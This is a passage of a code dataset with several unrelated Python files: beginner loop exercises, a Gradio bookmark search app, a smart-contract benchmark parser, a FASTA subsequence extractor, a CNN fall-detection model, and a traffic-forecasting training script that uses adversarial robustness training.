Grado.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2594764126","text":"\r\n\r\ndef countByFives(target):\r\n for i in range(5,target + 1,5):\r\n print(i)\r\n return\r\n \r\n \r\ndef sumFrom(target):\r\n sum = 0 \r\n for i in range(target + 1):\r\n sum = sum + i\r\n \r\n return sum\r\n\r\n\r\ndef 
countVowels(string):\r\n vowelSum = 0\r\n for i in range(len(string)):\r\n if string[i] in \"AEIOUaeiou\":\r\n vowelSum = vowelSum + 1\r\n return vowelSum\r\n\r\n\r\ndef countDigits(string):\r\n digitSum = 0\r\n for char in string:\r\n if char.isdigit():\r\n digitSum = digitSum + 1\r\n return digitSum\r\n\r\nprint(countDigits(\"Wow101Wow\"))\r\n\r\n","repo_name":"WillSchick/CS111-Coursework","sub_path":"Z) Exercises/WEEK6/forLoopModule.py","file_name":"forLoopModule.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14888327746","text":"import gradio as gr\nfrom utils import search_db,get_markdown\n\nwith gr.Blocks() as demo:\n gr.Markdown(\"# Lynx\\n\\n[GitHub](https://github.com/ChadDa3mon/lynx/tree/main)\") \n with gr.Tab(\"Add Bookmark\"):\n with gr.Row():\n add_url = gr.Textbox(label=\"URL To Add\",info=\"Enter the URL you wish to add\",scale=5)\n with gr.Tab(\"Search Bookmarks\"):\n with gr.Row():\n search_term = gr.Textbox(label=\"Search Term\")\n with gr.Row():\n search_results = gr.Dataframe(label=\"Search Results\",headers=['URL','Summary'],wrap=True)\n with gr.Row():\n webpage_markdown = gr.Markdown()\n search_term.submit(search_db,search_term,search_results)\n search_results.select(get_markdown,search_results,webpage_markdown)\n\n\ndemo.launch(inbrowser=False,server_name=\"0.0.0.0\")","repo_name":"ChadDa3mon/lynx","sub_path":"app/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12122512718","text":"import os, glob\nimport bm.unify, bm.io, bm.log, bm.solidity\n\ndef process(dataset, source, destination):\n benchmarks = set()\n for fn_bin in sorted(glob.glob(os.path.join(source,\"examples\",\"*\",\"verified_contract_bins\",\"*\"))):\n fn_list = fn_bin.split(os.sep)\n name,ext = os.path.splitext(fn_list[-1])\n vuln = fn_list[-3]\n\n bid = f\"{name}-{vuln}\"\n assert bid not in benchmarks\n benchmarks.add(bid)\n\n assert ext in (\".bin\",\".bin-runtime\")\n bytecode,runtime = (fn_bin,None) if ext == \".bin\" else (None,fn_bin)\n\n sol,etc = None,None\n for sol_base in (name,f\"{name}.sol\"):\n fn_sol = os.path.join(source,\"examples\",vuln,\"verified_contract_sols\",sol_base)\n if not os.path.isfile(fn_sol):\n continue\n src = bm.io.read_string(fn_sol)\n if bm.solidity.is_broken(src):\n bm.log.warn(f\"{fn_sol}: Broken Solidity file\")\n # Some source files are broken (are just \"None\" or miss line breaks)\n etc = { \"broken source\": os.path.join(\"examples\",vuln,\"verified_contract_sols\",os.path.basename(fn_sol)) }\n continue\n assert not sol\n sol = fn_sol\n\n bm.unify.save(destination, dataset, bid, [(vuln,True)],\n sol = sol,\n bytecode = bytecode,\n runtime = runtime,\n etc = etc)\n","repo_name":"gsalzer/cgt","sub_path":"construction/scripts/bm/parsers/ContractFuzzer.py","file_name":"ContractFuzzer.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"33506713516","text":"#!/usr/bin/env python3.5\n# Fredrik Boulund 2016\n# Extract sub sequences from a FASTA file using ranges\n# added to FASTA headers by Easel bash pipeline.\n\nfrom read_fasta import read_fasta\nfrom sys import argv, exit, stdout\nfrom collections import namedtuple, OrderedDict\nimport argparse\n\n\ndef parse_args(argv):\n \"\"\"\n Parse commandline arguments.\n \"\"\"\n\n desc 
= \"\"\"Extract sub sequences from FASTA files. Fredrik Boulund 2016\"\"\"\n parser = argparse.ArgumentParser(description=desc)\n parser.add_argument(\"PFA\",\n help=\"Protein FASTA file to read headers with range information from.\")\n parser.add_argument(\"NFA\",\n help=\"Nucleotide FASTA file to read sub sequences from.\")\n parser.add_argument(\"-p\", \"--prefix\", \n help=\"FASTA header prefix to replace previous header with.\")\n parser.add_argument(\"-o\", \"--outfile\", metavar=\"FILE\", dest=\"outfile\",\n default=\"\",\n help=\"Write output to FILE instead of STDOUT.\")\n\n if len(argv)<2:\n parser.print_help()\n exit()\n \n options = parser.parse_args()\n return options\n\n\ndef extract_subsequence_records(fastafile):\n \"\"\"\n Extract sub sequence records (reading frame and start, end) from FASTA headers.\n\n The following format of headers is expected:\n >NODE_60_length_635_cov_2.53448_ID_19982_5/10-212\n ^ ^ ^\n | | End\n | Start\n Reading frame\n The start and end in the header are 1-based in protein sequence coordinates.\n The function returns the equivalent 0-based nucleotide sequence coordinates.\n \"\"\"\n\n Subsequence_Record = namedtuple(\"Subsequence_Record\", \"frame, start, end\")\n subsequence_records = OrderedDict()\n for long_header, sequence in read_fasta(fastafile, keep_formatting=False):\n header, frame_start_end = long_header.rsplit(\"_\", 1)\n frame, start_end = frame_start_end.split(\"/\")\n start, end = start_end.split(\"-\")\n subseq_rec = Subsequence_Record(int(frame), int(start)*3-3, int(end)*3-3)\n subsequence_records[header] = subseq_rec\n return subsequence_records\n\n\ndef revcomp(sequence):\n \"\"\"\n Return the reverse complement of DNA sequence.\n \"\"\"\n return sequence.upper().translate(str.maketrans(\"ACGT\", \"TGCA\"))[::-1]\n\n\ndef extract_subseq(sequence, subseq): #frame, start, end):\n \"\"\"\n Extract subsequence from a sequence string.\n\n This follows EMBOSS transeq's implementation on how\n reading frames are interpreted. 
The starting position\n  of the reverse complement is adjusted based on the \n  total length of the sequence modulo 3, so that the\n  reverse frames correspond to the same position of the \n  frames in the forward sequence.\n  \"\"\"\n  reverse_adjustment = len(sequence) % 3\n  if subseq.frame == 1:\n    return sequence[subseq.start:subseq.end]\n  elif subseq.frame == 2:\n    return sequence[1:][subseq.start:subseq.end]\n  elif subseq.frame == 3:\n    return sequence[2:][subseq.start:subseq.end]\n  elif subseq.frame == 4:\n    start = subseq.start + reverse_adjustment\n    end = subseq.end + reverse_adjustment\n    return revcomp(sequence)[start:end]\n  elif subseq.frame == 5:\n    start = subseq.start + reverse_adjustment\n    end = subseq.end + reverse_adjustment\n    return revcomp(sequence)[2:][start:end]\n  elif subseq.frame == 6:\n    start = subseq.start + reverse_adjustment\n    end = subseq.end + reverse_adjustment\n    return revcomp(sequence)[1:][start:end]\n\n\ndef main(options):\n  \"\"\"\n  Main function\n  \"\"\"\n\n  subsequences = extract_subsequence_records(options.PFA)\n  nucleotide_sequences = {h: s for h, s in read_fasta(options.NFA, keep_formatting=False)}\n\n  if options.outfile:\n    outfile = open(options.outfile, 'w')\n  else:\n    outfile = stdout\n\n  with outfile:\n    for counter, header_subseq in enumerate(subsequences.items(), start=1):\n      header, subseq = header_subseq\n      if options.prefix:\n        print(\">\"+options.prefix+\"_\"+str(counter), header, subseq, file=outfile)\n      else:\n        print(\">\"+header, subseq, file=outfile)\n      e_subseq = extract_subseq(nucleotide_sequences[header], subseq) \n      print(e_subseq, file=outfile)\n\n\nif __name__ == \"__main__\":\n  options = parse_args(argv)\n  main(options)\n","repo_name":"boulund/qnr-assembly","sub_path":"extract_nucleotide_ranges.py","file_name":"extract_nucleotide_ranges.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"12675447756","text":"# -*- coding:UTF-8 -*-\n\n'''\nCNN Model\n'''\nimport time\nimport numpy as np\nimport tensorflow as tf\nimport dataset\nimport pandas as pd\nimport sys\n\nsys.path.insert(0, '../utils/')\nimport transform\n\nMODEL_SEVE_PATH = '../model/model.ckpt'\n# Label = {'STD':1,'WAL':2,'JOG':3,'JUM':4,'STU':5,'STN':6,'SCH':7,'SIT':8,'CHU':9,\n#          'CSI':10,'CSO':11,'LYI':12,'FOL':0,'FKL':0,'BSC':0,'SDL':0}\n\nLabel = {0:'Fall',1:'Stand',2:'Walk',3:'Jog',4:'Jump',5:'up_stair',6:'down_stair',\n         7:'stand2sit',8:'sitting',9:'sit2stand',10:'CSI',11:'CSO',12:'LYI'}\n\n# Hyperparameter\nCLASS_LIST = [0,2,3,4,5,6,7,9]\nCLASS_NUM = len(CLASS_LIST)\nLEARNING_RATE = 0.001\nTRAIN_STEP = 10000\nBATCH_SIZE = 50\n\ndef wights_variable(shape):\n    '''\n    Weight variable tensor\n    :param shape:\n    :return:\n    '''\n    wights = tf.truncated_normal(shape=shape,stddev=0.1)\n    return tf.Variable(wights,dtype=tf.float32)\n\ndef biases_variable(shape):\n    '''\n    Bias variable tensor\n    :param shape:\n    :return:\n    '''\n    bias = tf.constant(0.1,shape=shape)\n    return tf.Variable(bias,dtype=tf.float32)\n\ndef conv2d(x,kernel):\n    '''\n    Network convolution layer\n    :param x: Input x\n    :param kernel: Convolution kernel\n    :return: Return the result after convolution\n    '''\n    return tf.nn.conv2d(x,kernel,strides=[1,1,1,1],padding='SAME')\n\ndef max_pooling_2x2(x):\n    '''\n    Max pooling layer\n    :param x: Input x\n    :return: Return pooled data\n    '''\n    return tf.nn.max_pool(x,ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME')\n\ndef lrn(x):\n    '''\n    local response normalization\n    Local response normalization can improve accuracy\n    :param x: Input x\n    :return:\n    '''\n\n    return tf.nn.lrn(x,4,1.0,0.001,0.75)\n\n\ndef fall_net(x):\n    '''\n    Fall detection network\n    :param x: Input tensor, shape=[None,]\n    :return:\n    '''\n\n    with tf.name_scope('reshape'):\n        x = tf.reshape(x,[-1,20,20,3])\n        x = x / 255.0 * 2 - 1\n\n    with tf.name_scope('conv1'):\n        # value shape:[-1,20,20,32]\n        conv1_kernel = wights_variable([5,5,3,32])\n        conv1_bias = biases_variable([32])\n        conv1_conv = conv2d(x,conv1_kernel)+conv1_bias\n        conv1_value = tf.nn.relu(conv1_conv)\n\n    with tf.name_scope('max_pooling_1'):\n        # value shape:[-1,10,10,32]\n        mp1 = max_pooling_2x2(conv1_value)\n\n    with tf.name_scope('conv2'):\n        # value shape:[-1,10,10,64]\n        conv2_kernel = wights_variable([5,5,32,64])\n        conv2_bias = biases_variable([64])\n        conv2_conv = conv2d(mp1,conv2_kernel)+conv2_bias\n        conv2_value = tf.nn.relu(conv2_conv)\n\n    with tf.name_scope('max_pooling_2'):\n        # value shape:[-1,5,5,64]\n        mp2 = max_pooling_2x2(conv2_value)\n\n    with tf.name_scope('fc1'):\n        fc1_wights = wights_variable([5*5*64,512])\n        fc1_biases = biases_variable([512])\n\n        fc1_input = tf.reshape(mp2,[-1,5*5*64])\n        fc1_output = tf.nn.relu(tf.matmul(fc1_input,fc1_wights)+fc1_biases)\n\n    with tf.name_scope('drop_out'):\n        keep_prob = tf.placeholder(dtype=tf.float32)\n        drop_out = tf.nn.dropout(fc1_output,keep_prob)\n\n    with tf.name_scope('fc2'):\n        fc2_wights = wights_variable([512,CLASS_NUM])\n        fc2_biases = biases_variable([CLASS_NUM])\n        fc2_output = tf.matmul(drop_out,fc2_wights)+fc2_biases\n\n    return fc2_output,keep_prob\n\n\ndef train_model():\n    '''\n    Train the model and save the trained model parameters\n    :return: Return the trained model parameters\n    '''\n    with tf.name_scope('input_dataset'):\n        x = tf.placeholder(tf.float32,[None,1200])\n        y = tf.placeholder(tf.float32,[None,CLASS_NUM])\n        y_,keep_prob = fall_net(x)\n\n    with tf.name_scope('loss'):\n        cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=y,logits=y_)\n        loss = tf.reduce_mean(cross_entropy)\n        tf.summary.scalar(\"loss\", loss)\n\n    with tf.name_scope('optimizer'):\n        train = tf.train.AdamOptimizer(LEARNING_RATE).minimize(loss)\n\n    with tf.name_scope('accuracy'):\n        correct_prediction = tf.equal(tf.argmax(y_,1),tf.argmax(y,1))\n        correct_prediction = tf.cast(correct_prediction,tf.float32)\n        accuracy = tf.reduce_mean(correct_prediction)\n        tf.summary.scalar(\"accuracy\", accuracy)\n\n    data = dataset.DataSet('../data/dataset',CLASS_LIST)\n    saver = tf.train.Saver()\n    merged = tf.summary.merge_all()\n\n    with tf.Session() as sess:\n        sess.run(tf.global_variables_initializer())\n        train_writer = tf.summary.FileWriter(\"../log/\", sess.graph)\n\n        for step in range(1, TRAIN_STEP+1):\n            batch_x, batch_y = data.next_batch(BATCH_SIZE)\n            if step%100==0:\n                train_accuracy = accuracy.eval(feed_dict={x: batch_x, y: batch_y, keep_prob: 1.0})\n                print('Training %d times, the accuracy rate is %f' % (step, train_accuracy))\n                summ = sess.run(merged, feed_dict={x: batch_x, y: batch_y,keep_prob: 1.0})\n                train_writer.add_summary(summ, global_step=step)\n\n            train.run(feed_dict={x: batch_x, y: batch_y, keep_prob: 0.5})\n\n        train_writer.close()\n        save_path = saver.save(sess, MODEL_SEVE_PATH)\n        print(\"After training, the weights are saved to:%s\"%(save_path))\n\ndef test_model():\n    '''\n    Use the test data set to test the trained model\n    :return: Test Results\n    '''\n    data = dataset.DataSet('../data/dataset', CLASS_LIST, True)\n    test_x, test_y = data.get_test_data()\n\n    tf.reset_default_graph()\n    with tf.name_scope('input'):\n        x = tf.placeholder(tf.float32,[None,1200])\n        y = tf.placeholder(tf.float32,[None,CLASS_NUM])\n        y_,keep_prob = fall_net(x)\n\n    with tf.name_scope('accuracy'):\n        correct_prediction = tf.equal(tf.argmax(y_,1),tf.argmax(y,1))\n        correct_prediction = tf.cast(correct_prediction,tf.float32)\n        accuracy = tf.reduce_mean(correct_prediction)\n\n    start_time = time.time()\n\n    saver = tf.train.Saver()\n    with tf.Session() as sess:\n        saver.restore(sess, \"../model/model.ckpt\")\n        p_y = np.argmax(sess.run(y_,feed_dict={x: test_x,keep_prob: 1.0}),1)\n        print(\"Accuracy rate %f\" % accuracy.eval(feed_dict={x: test_x, y: test_y, keep_prob: 1.0}))\n\n    test_time = str(time.time() - start_time)\n    print('Test time is:',test_time)\n\n    g_truth = np.argmax(test_y,1)\n    avg_sensitivity = 0\n    avg_specificity = 0\n\n    for i in range(CLASS_NUM):\n        accuracy,sensitivity,specificity = evaluate(p_y,g_truth,i)\n        print('class:%10s,accuracy =%05f,sensitivity =%05f,specificity =%05f'%(Label[CLASS_LIST[i]],accuracy,sensitivity,specificity))\n        avg_sensitivity += sensitivity\n        avg_specificity += specificity\n\n    avg_sensitivity = avg_sensitivity/CLASS_NUM\n    avg_specificity = avg_specificity/CLASS_NUM\n\n    print('avg_sensitivity=%05f,avg_specificity=%05f'%(avg_sensitivity,avg_specificity))\n\ndef evaluate(p,g,class_):\n    fall_index = []\n    data_size = g.size\n    for i in range(data_size):\n        if g[i] ==class_:\n            fall_index.append(i)\n    fall_num = len(fall_index)\n\n    TP = 0\n    FN = 0\n    for i in range(fall_num):\n        index = fall_index[i]\n        if p[index] == g[index]:\n            TP+=1\n        else:\n            FN+=1\n    sensitivity = TP/(TP+FN)\n\n\n    FP =0\n    TN =0\n    for i in range(data_size):\n        if g[i]!=class_:\n            if p[i] == class_:\n                FP+=1\n            else:\n                TN+=1\n\n    specificity = TN/(FP+TN)\n\n    accuracy = (TP+TN)/(FP+TN+TP+FN)\n    return accuracy,sensitivity,specificity\n\n\n\ndef demo_run():\n    #TODO:\n    TEST_DATA = transform.main()\n    # TEST_DATA = '../data/dataset/fall_data_abhi.csv'\n    # TEST_DATA = '../data/dataset/0_fall_data.csv'\n    # TEST_DATA = '../data/test.csv'\n    _test_x = []\n    _test_y = []\n    entry = 1\n    class_list = CLASS_LIST\n    class_num = CLASS_NUM\n    # all_data = pd.read_csv(TEST_DATA,index_col=False)\n    all_data = TEST_DATA\n\n    if all_data.shape != (1, 1200):\n        print('Illegal data format:', all_data.shape)\n\n    print(\"input data:\", all_data.shape)\n    # label = all_data.iloc[entry, 0]\n    # print(\"label\", label)\n    # _test_y.append(label)\n    _test_x.append(all_data.iloc[0, 0:1200])\n    test_x = np.array(_test_x)\n    # test_x = all_data.iloc[0, 0:1200]\n    # test_y = np.array(_test_y)\n    print(_test_x)\n    print(test_x)\n    \n    print(test_x.shape)\n    # print(test_y)\n\n    tf.reset_default_graph()\n    with tf.name_scope('input'):\n        x = tf.placeholder(tf.float32,[None,1200])\n        y = tf.placeholder(tf.float32,[None,CLASS_NUM])\n        y_,keep_prob = fall_net(x)\n\n    start_time = time.time()\n\n    saver = tf.train.Saver()\n    with tf.Session() as sess:\n        saver.restore(sess, \"../model/model.ckpt\")\n        p_y = np.argmax(sess.run(y_,feed_dict={x: test_x,keep_prob: 1.0}),1)\n        print(\"************** prediction:\", p_y)\n    \n\n\n\n\nif __name__=='__main__':\n\n    # train_model()\n    # test_model()\n\n\n    demo_run()\n","repo_name":"Ruksana-RASHEED/FD-CNN-1","sub_path":"src/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":8978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"24931948461","text":"import os\nimport argparse\nimport shutil\nimport yaml\nfrom mmcv import Config\nimport pickle as pk\nimport numpy as np\n\nimport 
torch\nimport torch.nn as nn\nimport time\nfrom utils.data_utils import mae\n\nfrom models.astgcn import ASTGCN\nfrom models.stgcn import STGCN\n\nfrom models.GraphWaveNet import gwnet\n\nfrom models.PolicyAttentionNet import STPolicyAttentionNet\n\nfrom attacks.other_attacks import _ST_pgd_whitebox\nimport copy\nfrom utils.env import get_root_logger, set_random_seed, set_default_configs, \\\n init_dist, logger_info\nfrom datasets.datasets import METRLA, HKSPEED,PeMS, PeMSD4\nfrom torch.utils.data import DataLoader\nfrom datasets.datasets import DataLoaderX\n\nfrom methods.train_modes import plain_train, ST_pgd_adv_policy_Atten_train, ST_pgd_adv_policy_Atten_offine_train, \\\nST_pgd_adv_policy_Atten_dist_offline_train\n\nparser = argparse.ArgumentParser(description='STGCN')\nparser.add_argument('--enable-cuda', action='store_true',\n help='Enable CUDA')\nparser.add_argument('--gpu', default=6, type=int,\n help='which gpu to use')\nparser.add_argument('--no-cuda', action='store_true', default=False,\n help='disables CUDA training')\nparser.add_argument('--seed', type=int, default= 24, metavar='S',\n help='random seed (default: 24)')\nparser.add_argument('--rename', '-r', action='store_true', default=False,\n help='whether allow renaming the checkpoints parameter to match')\nparser.add_argument('--launcher', choices=['none', 'pytorch', 'slurm', 'mpi'],\n default='none', help='job launcher')\nparser.add_argument('--local_rank', type=int, default=0)\nparser.add_argument('--use_gpu',action='store_true',default=True,\n help='ables cCUDA training')\nparser.add_argument('config',\n default='E:/Project/Robust_STGCN/configs/METRLA/METRLA-train0.6-val0.2-test0.2-standard-stgcn.yaml',\n help='path to config file')\nparser.add_argument('--mode', '-a', default='TRAIN', # ['TRAIN', 'TEST']\n help='which attack to perform')\nparser.add_argument('--device_id', '-d', default= 2, type=int,# ['TRAIN', 'TEST']\n help='device ID')\nimport os\n\n\nargs = parser.parse_args()\nset_random_seed(args.seed)\n\nargs.device = None\nif args.enable_cuda and torch.cuda.is_available():\n args.device = torch.device('cuda')\nelse:\n args.device = torch.device('cpu')\n# init distributed env first, since logger depends on the dist info.\nif args.launcher == 'none':\n distributed = False\n device = torch.device(\"cuda\")\nelse:\n distributed = True\n init_dist(args.launcher)\n local_rank = torch.distributed.get_rank()\n # torch.cuda.set_device(local_rank)\n device = torch.device(\"cuda\", local_rank)\nprint(\"Using\", torch.cuda.device_count(), \"GPUs.\")\nargs.device = torch.device('cuda')\nprint(\"Using \", args.device)\nwith open(args.config) as cf:\n cfgs = Config(yaml.safe_load(cf))\nif not os.path.exists(cfgs.model_dir):\n os.makedirs(cfgs.model_dir)\ntorch.backends.cudnn.benchmark = True\ntorch.cuda.set_device(args.device_id)\nshutil.copyfile(args.config, os.path.join(cfgs.model_dir, args.config.split('/')[-1]))\nset_default_configs(cfgs)\n# setup logger\nlogger = get_root_logger(cfgs.log_level, cfgs.model_dir)\nlogger_info(logger, distributed, \"Loading config file from {}\".format(args.config))\nlogger_info(logger, distributed, \"Models saved at {}\".format(cfgs.model_dir))\n\nif cfgs.dataset == 'METRLA':\n\n train_data = METRLA(mode='train',\n split_train=cfgs.split_train,\n split_val=cfgs.split_val,\n num_timesteps_input=cfgs.num_timesteps_input,\n num_timesteps_output=cfgs.num_timesteps_output)\n val_data = METRLA(mode='val',\n split_train=cfgs.split_train,\n split_val=cfgs.split_val,\n 
num_timesteps_input=cfgs.num_timesteps_input,\n num_timesteps_output=cfgs.num_timesteps_output)\n test_data = METRLA(mode='test',\n split_train=cfgs.split_train,\n split_val=cfgs.split_val,\n num_timesteps_input=cfgs.num_timesteps_input,\n num_timesteps_output=cfgs.num_timesteps_output)\n\nelif cfgs.dataset == 'HKSPEED':\n\n train_data = HKSPEED(mode='train',\n split_train=cfgs.split_train,\n split_val=cfgs.split_val,\n num_timesteps_input=cfgs.num_timesteps_input,\n num_timesteps_output=cfgs.num_timesteps_output)\n val_data = HKSPEED(mode='val',\n split_train=cfgs.split_train,\n split_val=cfgs.split_val,\n num_timesteps_input=cfgs.num_timesteps_input,\n num_timesteps_output=cfgs.num_timesteps_output)\n test_data = HKSPEED(mode='test',\n split_train=cfgs.split_train,\n split_val=cfgs.split_val,\n num_timesteps_input=cfgs.num_timesteps_input,\n num_timesteps_output=cfgs.num_timesteps_output)\nelif cfgs.dataset == 'PeMS':\n\n train_data = PeMS(mode='train',\n split_train=cfgs.split_train,\n split_val=cfgs.split_val,\n num_timesteps_input=cfgs.num_timesteps_input,\n num_timesteps_output=cfgs.num_timesteps_output)\n val_data = PeMS(mode='val',\n split_train=cfgs.split_train,\n split_val=cfgs.split_val,\n num_timesteps_input=cfgs.num_timesteps_input,\n num_timesteps_output=cfgs.num_timesteps_output)\n test_data = PeMS(mode='test',\n split_train=cfgs.split_train,\n split_val=cfgs.split_val,\n num_timesteps_input=cfgs.num_timesteps_input,\n num_timesteps_output=cfgs.num_timesteps_output)\nelif cfgs.dataset == 'PeMSD4':\n\n train_data = PeMSD4(mode='train',\n split_train=cfgs.split_train,\n split_val=cfgs.split_val,\n num_timesteps_input=cfgs.num_timesteps_input,\n num_timesteps_output=cfgs.num_timesteps_output)\n val_data = PeMSD4(mode='val',\n split_train=cfgs.split_train,\n split_val=cfgs.split_val,\n num_timesteps_input=cfgs.num_timesteps_input,\n num_timesteps_output=cfgs.num_timesteps_output)\n test_data = PeMSD4(mode='test',\n split_train=cfgs.split_train,\n split_val=cfgs.split_val,\n num_timesteps_input=cfgs.num_timesteps_input,\n num_timesteps_output=cfgs.num_timesteps_output)\nelse:\n raise NameError\n\n\n\n\n\n\ntrain_loader = DataLoaderX(train_data, batch_size=cfgs.batch_size, shuffle=True, num_workers =8, pin_memory=True)\nval_loader = DataLoaderX(val_data, batch_size=cfgs.batch_size, shuffle=False, num_workers =8, pin_memory=True)\ntest_loader = DataLoaderX(test_data, batch_size=cfgs.batch_size, shuffle=False)\n\ndef train(epoch, logger,train_loader, val_loader, net,optimizer,policynet, policy_optimizer, A_wave, A, loss_criterion, max_speed, edges, edge_weights):\n \"\"\"\n Trains one epoch with the given data.\n :param training_input: Training inputs of shape (num_samples, num_nodes,\n num_timesteps_train, num_features).\n :param training_target: Training targets of shape (num_samples, num_nodes,\n num_timesteps_predict).\n :param batch_size: Batch size to use during training.\n :return: Average loss for this epoch.\n \"\"\"\n start = time.time()\n samples_total = len(train_loader) * cfgs.batch_size\n epoch_training_losses = 0\n epoch_training_losses_len = 0\n epoch_rewarding_losses = 0\n epoch_rewarding_losses_len = 0\n save_checkpoint_methods = [\"AT_policy_atten_dist_offline\"]\n if cfgs.train_mode in save_checkpoint_methods:\n if epoch > 1:\n # load last epoch as the student model\n teacher_model_path = cfgs.model_dir + '/epoch{}.pt'.format(epoch - 1)\n logger.info('Loading teacher model from checkpoint from %s', teacher_model_path)\n teacher_model = 
copy.deepcopy(net).to(device)\n teacher_model.load_state_dict(torch.load(teacher_model_path))\n teacher_model.eval()\n else:\n teacher_model = None\n\n for batch_idx, (data, target) in enumerate(train_loader):\n\n net.train()\n optimizer.zero_grad()\n\n\n X_batch, y_batch = data, target\n X_batch = X_batch.to(device=args.device)\n y_batch = y_batch.to(device=args.device)\n\n\n loss_params = dict(\n model=net, x_natural=X_batch ,A_wave=A_wave, edges = edges, edge_weights= edge_weights, y=y_batch ,\n optimizer=optimizer,step_size=cfgs.train_step_size, epsilon=cfgs.train_epsilon,\n perturb_steps=cfgs.train_num_steps, distance=cfgs.distance,\n rand_start_mode=cfgs.rand_start_mode,rand_start_step=cfgs.rand_start_step,\n K = int(cfgs.train_attack_nodes * A_wave.size(0)),\n find_type = cfgs.find_type\n )\n if 'plain' == cfgs.train_mode:\n loss = plain_train(**loss_params)\n elif \"AT_policy_atten\" == cfgs.train_mode:\n extr_params = dict(\n policynet=policynet,\n policy_optimizer = policy_optimizer,\n device = device,\n num_samples = cfgs.num_samples,\n constant = cfgs.constant,\n is_known_first_node = cfgs.is_known_first_node,\n baseline = cfgs.baseline\n )\n loss,reward = ST_pgd_adv_policy_Atten_train(**loss_params,**extr_params)\n epoch_rewarding_losses += reward\n epoch_rewarding_losses_len += 1\n train_reward = epoch_rewarding_losses / epoch_rewarding_losses_len\n elif \"AT_policy_atten_dist_offline\" == cfgs.train_mode:\n extr_params = dict(\n policynet=policynet,\n device = device,\n alpha_reg = cfgs.alpha_reg,\n teacher_model = teacher_model,\n epoch = epoch\n )\n loss = ST_pgd_adv_policy_Atten_dist_offline_train(**loss_params,**extr_params)\n\n elif \"AT_policy_atten_offine\" == cfgs.train_mode:\n extr_params = dict(\n policynet=policynet,\n device = device,\n )\n loss = ST_pgd_adv_policy_Atten_offine_train(**loss_params,**extr_params)\n else:\n raise NameError\n\n loss.backward()\n optimizer.step()\n\n\n\n epoch_training_losses += loss.detach().cpu().numpy()\n epoch_training_losses_len += 1\n train_loss = epoch_training_losses / epoch_training_losses_len\n\n\n # print progress\n if batch_idx % cfgs.log_interval == 0:\n logger_info(logger, distributed,\n 'Epoch: {} [{}/{} ({:.0f}%)] Train Loss: {:.4f} time:{:.3f}'.format(\n epoch, batch_idx * len(data), samples_total,\n 100. 
* batch_idx / len(train_loader),\n train_loss,\n time.time() - start))\n\n\n\n\n\n if cfgs.train_mode in save_checkpoint_methods:\n torch.save(net.state_dict(),\n os.path.join(cfgs.model_dir, 'epoch{}.pt'.format(epoch)))\n save_checkpoint_methods_policy = [\"AT_policy_atten\"]\n if cfgs.train_mode in save_checkpoint_methods_policy:\n torch.save(policynet.state_dict(),\n os.path.join(cfgs.model_dir, 'policy_epoch{}.pt'.format(epoch)))\n else:\n train_reward = None\n val_loss, val_predict, val_target = eval_val(\n val_loader,\n net, A_wave,A,\n edges,\n edge_weights,\n loss_criterion)\n val_predict, val_target = val_predict * max_speed, val_target * max_speed\n\n mae_score = mae(val_predict, val_target)\n # print progress\n if batch_idx % cfgs.log_interval == 0:\n logger_info(logger, distributed,\n 'Epoch: {} Train Loss: {:.4f} Val Loss: {:.4f} MAE: {:.4f} time:{:.3f}'.format(epoch,\n train_loss,\n val_loss,\n mae_score,\n time.time() - start))\n\n return train_loss, val_loss, mae_score, train_reward\n\ndef eval_val(val_loader,net, A_wave, A, edges, edge_weights, loss_criterion):\n \"\"\"\n Trains one epoch with the given data.\n :param training_input: Training inputs of shape (num_samples, num_nodes,\n num_timesteps_train, num_features).\n :param training_target: Training targets of shape (num_samples, num_nodes,\n num_timesteps_predict).\n :param batch_size: Batch size to use during training.\n :return: Average loss for this epoch.\n \"\"\"\n\n net.eval()\n with torch.no_grad():\n val_predict = []\n val_target = []\n epoch_val_losses = []\n for batch_idx, (data, target) in enumerate(val_loader):\n X_batch, y_batch = data, target\n X_batch = X_batch.to(device=args.device)\n y_batch = y_batch.to(device=args.device)\n\n if cfgs.backbone == \"RobustGWNET\":\n out, _ = net(X_batch, A_wave, edges, edge_weights)\n else:\n out = net(X_batch,A_wave, edges, edge_weights)\n\n\n loss = loss_criterion(out, y_batch)\n epoch_val_losses.append(loss.detach().cpu().numpy())\n val_predict.append(out.detach().cpu().numpy())\n val_target.append(y_batch.detach().cpu().numpy())\n\n val_predict = np.vstack(val_predict)\n val_target = np.vstack(val_target)\n return sum(epoch_val_losses)/len(epoch_val_losses), val_predict, val_target\n\ndef eval_val_pgd(val_loader,net, A_wave, A, edges, edge_weights, loss_criterion, max_speed, cfgs):\n \"\"\"\n Trains one epoch with the given data.\n :param training_input: Training inputs of shape (num_samples, num_nodes,\n num_timesteps_train, num_features).\n :param training_target: Training targets of shape (num_samples, num_nodes,\n num_timesteps_predict).\n :param batch_size: Batch size to use during training.\n :return: Average loss for this epoch.\n \"\"\"\n train_attack_nodes = int(cfgs.train_attack_nodes * len(A_wave))\n net.eval()\n with torch.no_grad():\n val_predict = []\n val_target = []\n epoch_val_losses = []\n adv_pgd_val_predict = []\n for batch_idx, (data, target) in enumerate(val_loader):\n X_batch, y_batch = data, target\n X_batch = X_batch.to(device=args.device)\n y_batch = y_batch.to(device=args.device)\n\n\n out = net(X_batch,A_wave, edges, edge_weights)\n\n _, X_pgd, index = _ST_pgd_whitebox(net,\n X_batch,\n y_batch,\n A_wave,\n A,\n edges,\n edge_weights,\n train_attack_nodes,\n cfgs.train_epsilon,\n cfgs.train_num_steps,\n cfgs.random,\n cfgs.train_step_size,\n find_type='random')\n\n adv_pgd_out = net(X_pgd, A_wave, edges, edge_weights)\n\n\n loss = 